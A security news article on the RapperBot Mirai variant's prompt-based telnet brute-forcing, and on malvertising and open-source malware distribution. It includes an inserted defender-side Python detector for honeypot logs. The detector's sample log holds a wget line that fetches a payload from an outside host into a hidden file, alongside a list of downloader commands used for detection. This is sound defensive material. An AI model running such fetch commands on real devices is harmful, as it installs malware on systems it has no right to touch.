New Mirai Variant Employs Uncommon Tactics to Distribute Malware

Published: 23/11/2024   Category: security


RapperBot's initial infection tactic is one example of the different methods attackers are using to distribute malware.



A new version of a Mirai variant called RapperBot is the latest example of malware using relatively uncommon or previously unknown infection vectors to try to spread widely.
RapperBot first surfaced last year as Internet of Things (IoT) malware containing large chunks of Mirai source code but with some substantially different functionality compared with other Mirai variants. The differences included the use of a new protocol for command-and-control (C2) communications and a built-in feature for brute-forcing SSH servers rather than Telnet services, as is common in Mirai variants.
Researchers from Fortinet tracking the malware last year observed its authors regularly altering the malware, first by adding code to maintain persistence on infected machines even after a reboot, and then with code for self-propagation via a remote binary downloader. Later, the malware authors removed the self-propagation feature and added one that allowed them persistent remote access to brute-forced SSH servers.
In the fourth quarter of 2022, Kaspersky's researchers discovered a new RapperBot variant circulating in the wild, where the SSH brute-force functionality had been removed and replaced with capabilities for targeting telnet servers.
Kaspersky's analysis of the malware showed it also integrated what the security vendor described as an intelligent and somewhat uncommon feature for brute-forcing telnet. Rather than brute-forcing with a huge set of credentials, the malware checks the prompt received when it telnets to a device and, based on that, selects the appropriate set of credentials for a brute-force attack. That significantly speeds up the brute-forcing process compared with many other malware tools, Kaspersky said.
"When you telnet to a device, you typically get a prompt," says Jornt van der Wiel, a senior security researcher at Kaspersky. The prompt can reveal some information that RapperBot uses to determine the device it's targeting and which credentials to use, he says.
Depending on the IoT device that is targeted, RapperBot uses different credentials, he says. "So, for device A, it uses user/password set A; and for device B, it uses user/password set B," van der Wiel says.
The malware then uses a variety of possible commands, such as wget, curl, and ftpget, to download itself onto the target system. If these methods don't work, the malware uses a downloader and installs itself on the device, according to Kaspersky.
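A defender-side illustration of the behaviour described above, added here as an example and not code from the article or from Kaspersky: it parses a constructed honeypot-style telnet session log and flags sessions in which a login succeeds within a few seconds of the banner prompt (consistent with credentials chosen from the prompt rather than a long guessing run) and is then followed by a wget, curl or ftpget fetch. The log format, event names and the five-second threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed honeypot-style telnet session log (sample data, not from the article).
# Assumed format: <ISO timestamp> <session id> <event> [<detail>]
SAMPLE_LOG = """\
2024-11-23T10:00:01 s1 prompt Router login:
2024-11-23T10:00:02 s1 login-success admin:admin
2024-11-23T10:00:03 s1 cmd wget http://203.0.113.5/x.arm -O /tmp/.x
2024-11-23T10:05:01 s2 prompt login:
2024-11-23T10:05:20 s2 login-failed root:root
2024-11-23T10:05:25 s2 login-failed root:12345
2024-11-23T10:10:01 s3 prompt login:
2024-11-23T10:10:30 s3 login-success operator:s3cr3t
2024-11-23T10:10:45 s3 cmd show interfaces
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)(?: (.*))?$")
DOWNLOADERS = {"wget", "curl", "ftpget"}  # fetch commands named in the article

def parse_sessions(log_text):
    """Group log lines by session id as (timestamp, event, detail) tuples."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, sid, event, detail = m.groups()
            sessions[sid].append((datetime.fromisoformat(ts), event, detail or ""))
    return dict(sessions)

def flag_rapperbot_like(sessions, max_login_delay=5.0):
    """Return session ids where a login succeeded within max_login_delay seconds
    of the first prompt (assumed heuristic: credentials chosen from the prompt,
    not a long guessing run) and a downloader command followed."""
    flagged = []
    for sid, events in sessions.items():
        prompt_ts = login_ts = None
        downloaded = False
        for ts, event, detail in events:
            if event == "prompt" and prompt_ts is None:
                prompt_ts = ts
            elif event == "login-success" and login_ts is None:
                login_ts = ts
            elif event == "cmd" and (detail.split() or [""])[0] in DOWNLOADERS:
                downloaded = True
        if (prompt_ts and login_ts and downloaded
                and (login_ts - prompt_ts).total_seconds() <= max_login_delay):
            flagged.append(sid)
    return flagged
```

Session s3 shows why both conditions matter: a legitimate operator logging in slowly and running a normal command is not flagged even though the login succeeded.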
RapperBot's brute-force process is relatively uncommon, and van der Wiel says he can't name other malware samples that use the approach.
Even so, given the sheer number of malware samples in the wild, it's impossible to say whether it is the only malware currently using this approach. It's likely not the first piece of malicious code to use the technique, he says.
Kaspersky pointed to RapperBot as one example of malware employing rare and sometimes previously unseen techniques to spread.
Another example is Rhadamanthys, an information stealer available under a malware-as-a-service option on a Russian-language cybercriminal forum. The info stealer is one among a growing number of malware families that threat actors have begun distributing via malicious advertisements.
The tactic involves adversaries planting malware-laden advertisements, or ads with links to phishing sites, on online ad platforms. Often the ads are for legitimate software products and applications and contain keywords that ensure they surface high in search engine results or when users browse certain websites. In recent months, threat actors have used such so-called malvertisements to target users of widely used password managers such as LastPass, Bitwarden, and 1Password.
The growing success that threat actors have had with malvertising scams is spurring an increase in the use of the technique. The authors of Rhadamanthys, for instance, initially used phishing and spam emails before switching to malicious advertisements as the initial infection vector.
"Rhadamanthys doesn't do anything different from other campaigns using malvertising," van der Wiel says. "It is, however, part of a trend that we see: malvertising is becoming more popular."
Another trend Kaspersky has spotted: the growing use of open source malware among less-skilled cybercriminals.
Take CueMiner, a downloader for coin-mining malware available on GitHub. Kaspersky's researchers have observed attackers distributing the malware using Trojanized versions of cracked apps downloaded via BitTorrent or from OneDrive sharing networks.
"Due to its open source nature, everybody can download and compile it," van der Wiel explains. "As these users are typically not very advanced cybercriminals, they have to rely on relatively simple infection mechanisms, such as BitTorrent and OneDrive."
